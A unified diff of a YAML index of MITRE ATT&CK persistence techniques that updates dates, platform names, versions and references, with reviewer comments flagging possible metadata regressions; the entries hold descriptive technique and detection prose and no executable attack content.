+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -33238,24 +33650,26 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -33290,9 +33704,6 @@ persistence:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1505.004:
technique:
@@ -33352,7 +33763,7 @@ persistence:
description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
on Targets in the Middle East. Retrieved July 6, 2018.
source_name: Unit 42 RGDoor Jan 2018
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:06:24.161Z'
name: IIS Components
description: |-
Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version
, Http{Extension/Filter}Proc
, and (optionally) Terminate{Extension/Filter}
. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
@@ -33377,13 +33788,11 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.004
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
@@ -33436,8 +33845,8 @@ persistence:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -33485,78 +33894,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests: []
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -33604,6 +33946,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -33614,9 +33960,13 @@ persistence:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -33625,8 +33975,67 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests: []
T1547.002:
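Review bot: in the rewritten T1546.004 external references the `bencane blog bashrc` entry now points at a web.archive.org snapshot with a new retrieval date (September 25, 2024) instead of the live bencane.com URL, and the object's `modified` moves forward to 2024-09-25 to match; this is the one substantive content change in the T1546.004 rewrite (the rest is key reordering) and should be called out in the commit message so it is not mistaken for generator noise.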
@@ -33663,7 +34072,7 @@ persistence:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -33686,12 +34095,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests: []
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -33769,41 +34177,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests: []
T1137.004:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
- type: attack-pattern
- created: '2019-11-07T20:09:56.536Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.004
- url: https://attack.mitre.org/techniques/T1137/004
- - source_name: SensePost Outlook Home Page
- url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
- description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
- Ruler Vector. Retrieved February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:13.742Z'
name: 'Office Application Startup: Outlook Home Page'
description: |
Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -33812,27 +34190,54 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+ created: '2019-11-07T20:09:56.536Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/004
+ external_id: T1137.004
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Home Page
+ description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+ Ruler Vector. Retrieved February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.004
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
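Review bot: `x_mitre_permissions_required` (Administrator, User) is dropped from T1137.004 with no replacement while `x_mitre_version` goes from 1.1 to 1.2 and `x_mitre_attack_spec_version` from 2.1.0 to 3.2.0; any consumer of this index that filters tests by required privilege silently loses that signal, so confirm the field is really gone upstream rather than lost by the generator. In the same hunk T1574.009's `modified` moves backwards from 2023-05-09 to 2023-03-30, and the same regression recurs for several techniques below (T1037.005, T1037.003, T1543.001, T1547.007, T1037.001, T1547.008); if the generator now copies the STIX object's own `modified` instead of the bundle build time, that is fine, but it deserves a sentence in the commit message.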
@@ -33893,7 +34298,6 @@ persistence:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1037.005:
@@ -33937,7 +34341,7 @@ persistence:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -33959,7 +34363,6 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests: []
T1078.002:
@@ -34040,7 +34443,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -34063,7 +34465,7 @@ persistence:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -34093,12 +34495,10 @@ persistence:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1197:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:21:40.927Z'
name: BITS Jobs
description: |-
Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
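Review bot: for T1037.003 both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` are removed, leaving the entry with no spec version at all, whereas the neighbouring entries drop only `spec_version` (T1037.005 in the hunk at -33959 keeps `x_mitre_attack_spec_version: 2.1.0`); T1037.001 at -35498 shows the same double removal. Check whether these two objects genuinely lack `x_mitre_attack_spec_version` upstream or whether the generator is treating the two keys as one.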
@@ -34188,12 +34588,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1197
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -34278,7 +34677,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests: []
T1546.002:
@@ -34343,18 +34741,17 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests: []
T1556.009:
technique:
- modified: '2024-04-18T20:53:46.175Z'
+ modified: '2024-09-16T16:54:47.595Z'
name: Conditional Access Policies
description: "Adversaries may disable or modify conditional access policies
to enable persistent access to compromised accounts. Conditional access policies
are additional verifications used by identity providers and identity and access
management systems to determine whether a user should be granted access to
- a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+ a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
denied access to applications based on their IP address, device enrollment
status, and use of multi-factor authentication.(Citation: Microsoft Conditional
Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -34387,10 +34784,9 @@ persistence:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- - SaaS
- IaaS
- x_mitre_version: '1.0'
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Modification'
- 'Cloud Service: Cloud Service Modification'
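Review bot: T1556.009 loses `SaaS` from `x_mitre_platforms` together with `Azure AD`, leaving only `IaaS` and the new `Identity Provider`; everywhere else in this patch (T1136, T1078.004, T1556) `SaaS` survives the Azure AD / Office 365 / Google Workspace consolidation. Confirm that removal against upstream before merging, since it changes which platform-filtered indexes list this technique.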
@@ -34427,7 +34823,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.001:
technique:
@@ -34501,7 +34896,7 @@ persistence:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -34529,12 +34924,11 @@ persistence:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests: []
T1505:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T21:18:29.349Z'
name: Server Software Component
description: 'Adversaries may abuse legitimate extensible development features
of servers to establish persistent access to systems. Enterprise server applications
@@ -34593,33 +34987,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.001:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
- type: attack-pattern
- created: '2020-02-11T19:05:02.399Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.001
- url: https://attack.mitre.org/techniques/T1556/001
- - source_name: Dell Skeleton
- description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
- Retrieved April 8, 2019.
- url: https://www.secureworks.com/research/skeleton-key-malware-analysis
- - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
- description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
- June 3, 2016.
- source_name: TechNet Audit Policy
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T15:26:54.386Z'
name: Domain Controller Authentication
description: "Adversaries may patch the authentication process on a domain controller
to bypass the typical authentication mechanisms and enable access to accounts.
@@ -34640,6 +35011,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor for calls to OpenProcess
that can be
used to manipulate lsass.exe running on a domain controller as well as for
malicious modifications to functions exported from authentication-related
@@ -34654,52 +35026,42 @@ persistence:
used to execute binaries on a remote system as a particular account. Correlate
other security systems with login information (e.g. a user has an active login
session but has not entered the building or does not have VPN access). "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Process: Process Access'
- 'File: File Modification'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1556.005:
- technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--d50955c2-272d-4ac8-95da-10c29dda1c48
type: attack-pattern
- created: '2022-01-13T20:02:28.349Z'
+ id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+ created: '2020-02-11T19:05:02.399Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1556.005
- url: https://attack.mitre.org/techniques/T1556/005
- - source_name: store_pwd_rev_enc
- url: https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption
- description: Microsoft. (2021, October 28). Store passwords using reversible
- encryption. Retrieved January 3, 2022.
- - source_name: how_pwd_rev_enc_1
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible.html
- description: 'Teusink, N. (2009, August 25). Passwords stored using reversible
- encryption: how it works (part 1). Retrieved November 17, 2021.'
- - source_name: how_pwd_rev_enc_2
- url: http://blog.teusink.net/2009/08/passwords-stored-using-reversible_26.html
- description: 'Teusink, N. (2009, August 26). Passwords stored using reversible
- encryption: how it works (part 2). Retrieved November 17, 2021.'
- - source_name: dump_pwd_dcsync
- url: https://adsecurity.org/?p=2053
- description: Metcalf, S. (2015, November 22). Dump Clear-Text Passwords for
- All Admins in the Domain Using Mimikatz DCSync. Retrieved November 15, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1556/001
+ external_id: T1556.001
+ - source_name: Dell Skeleton
+ description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+ Retrieved April 8, 2019.
+ url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+ - source_name: TechNet Audit Policy
+ description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+ June 3, 2016.
+ url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
